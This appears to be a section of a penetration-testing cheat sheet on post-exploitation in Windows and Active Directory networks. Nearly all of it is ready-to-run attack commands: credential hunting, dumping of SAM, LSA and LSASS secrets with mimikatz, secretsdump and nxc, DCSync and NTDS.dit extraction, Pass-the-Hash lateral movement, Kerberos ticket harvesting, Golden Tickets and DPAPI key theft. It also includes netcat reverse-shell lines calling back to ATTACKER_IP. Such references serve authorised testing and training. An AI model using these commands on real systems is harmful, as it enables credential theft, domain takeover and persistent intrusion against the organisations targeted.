07 / Post Exploitation
Once inside — situational awareness, credential dumping, Pass-the-Hash, DCSync, NTDS.dit extraction, DPAPI, Golden Tickets and persistence. Everything after the foothold.
whoami /all # groups and privileges net localgroup Administrators # local admins net user /domain # domain users net group "Domain Admins" /domain ipconfig /all # network info for pivoting # System info: systeminfo hostname whoami /all ipconfig /all netstat -an net user /domain net group "Domain Admins" /domain tasklist /svc
dir C:\Users\*\Desktop\* dir C:\Users\*\Documents\* findstr /si "password" C:\Users\*.txt C:\Users\*.xml C:\Users\*.ini
dir /s *pass* *cred* *vnc* *.config* findstr /si "password" *.xml *.ini *.txt *.config reg query HKLM /f "password" /t REG_SZ /s reg query HKCU /f "password" /t REG_SZ /s
C:\Windows\Panther\Unattend.xml C:\Windows\Panther\Unattended.xml C:\Windows\System32\sysprep\sysprep.xml C:\unattend.xml
C:\inetpub\wwwroot\web.config C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
nxc smb $TARGET_IP -u $USERNAME -p $PASSWORD --sam # local SAM nxc smb $TARGET_IP -u $USERNAME -p $PASSWORD --lsa # LSA secrets nxc smb $TARGET_IP -u $USERNAME -p $PASSWORD -M lsassy # LSASS (plaintext + hashes) # subnet sweep: nxc smb $TARGET_IP/24 -u $USERNAME -p $PASSWORD --sam --local-auth nxc smb $TARGET_IP/24 -u $USERNAME -p $PASSWORD --lsa --local-auth # with hash: nxc smb $TARGET_IP -u $USERNAME -H $NTLMHASH --sam nxc smb $TARGET_IP -u $USERNAME -H $NTLMHASH --lsa
nxc smb $DC_IP -u $USERNAME -p '$PASSWORD' --ntds nxc smb $DC_IP -u $USERNAME -H '$NTLMHASH' --ntds
# LOCAL — SAM + LSA secrets (one machine): secretsdump.py DOMAIN/username:password@$TARGET_IP secretsdump.py DOMAIN/username:password@$TARGET_IP -outputfile local_dump secretsdump.py administrator:password@$TARGET_IP # local user (no domain) # with hash: secretsdump.py DOMAIN/username@$TARGET_IP -hashes :NTLMHASH # offline (NTDS.dit + SYSTEM hive): secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
# No credentials — abuse machine account (e.g. after ZeroLogon): secretsdump.py -just-dc -no-pass DC01\$@$DC_IP # With DA credentials: secretsdump.py DOMAIN/username:password@$DC_IP -just-dc -outputfile dc_dump
mimikatz privilege::debug token::elevate lsadump::sam # local NTLM hashes from SAM sekurlsa::msv # NTLM hashes from LSASS memory sekurlsa::logonpasswords # all logged-on users sekurlsa::wdigest # plaintext passwords (old systems) lsadump::lsa /patch # LSA secrets lsadump::cache # cached domain creds (MSCache2) lsadump::dcsync /user:krbtgt # DCSync for krbtgt lsadump::dcsync /domain:$DOMAIN /all # DCSync — all hashes lsadump::dcsync /domain:$DOMAIN /user:Administrator
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL -outputfile ntlm-extract nxc smb $DC_IP -u $USERNAME -p $PASSWORD -d $DOMAIN --ntds
evil-winrm -i $TARGET_IP -u Administrator -H NTLMHASH
nxc smb $TARGET_IP/24 -u $USERNAME -H 'NT:LM' --local-auth # local admin nxc smb $TARGET_IP/24 -u $USERNAME -H 'NT:LM' # domain admin nxc smb $TARGET_IP/24 -u $USERNAME -H 'NT:LM' -d $DOMAIN # domain admin with explicit domain # also run: --users --shares --groups --sam --lsa -M lsassy
smbexec.py Administrator@TARGET_IP -hashes 'NT:LM' # local admin smbexec.py $DOMAIN/Administrator@$TARGET_IP -hashes 'NT:LM' # domain admin
psexec.py Administrator@$TARGET_IP -hashes :NTLMHASH # local admin psexec.py $DOMAIN/Administrator@$TARGET_IP -hashes 'NT:LM' # domain admin
wmiexec.py Administrator@TARGET_IP -hashes :NTLMHASH # local admin wmiexec.py $DOMAIN/Administrator@$TARGET_IP -hashes 'NT:LM' # domain admin
xfreerdp /v:$TARGET_IP /u:$DOMAIN\\$USERNAME /pth:NTLMHASH /dynamic-resolution
privilege::debug sekurlsa::ekeys # dump all Kerberos keys (RC4, AES128, AES256) # RC4 (= NTLM hash): sekurlsa::pth /user:Administrator /domain:corp.local /rc4:HASH /run:"nc64.exe -e cmd.exe ATTACKER_IP 5556" # AES256 (OPSEC — less detectable): sekurlsa::pth /user:Administrator /domain:corp.local /aes256:HASH /run:"nc64.exe -e cmd.exe ATTACKER_IP 5556"
xfreerdp /v:VICTIM_IP /u:DOMAIN\\MyUser /pth:NTLM_HASH evil-winrm -i VICTIM_IP -u MyUser -H NTLM_HASH
Rubeus.exe harvest /interval:30 # harvest TGTs before they expire Rubeus.exe dump /nowrap # dump all tickets Rubeus.exe triage # overview of all tickets
secretsdump.py $DOMAIN/Administrator:$PASSWORD@$DC_IP -just-dc -outputfile full_dump
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL -outputfile ntlm-extract nxc smb $DC_IP -u $USERNAME -p $PASSWORD -d $DOMAIN --ntds
dpapi.py backupkeys -hashes :<hash> -t Administrator@$DC_IP --export
mimikatz → lsadump::dcsync /user:krbtgt → kerberos::golden ... ticketer.py -aesKey <aeskey> -domain-sid <domain_sid> -domain $DOMAIN <anyuser>
# - SID History backdoor user # - AD CS CA certificate export # - AdminSDHolder ACL
DonPAPI.py $DOMAIN/$USERNAME:$PASSWORD@$TARGET_IP
mimikatz sekurlsa::dpapi # dump DPAPI master keys from LSASS
dpapi.py backupkeys -hashes :<hash> -t Administrator@$DC_IP --export
DonPAPI -pvk <domain_backupkey.pvk> -h :<hash> $DOMAIN/$USERNAME@<ip_range>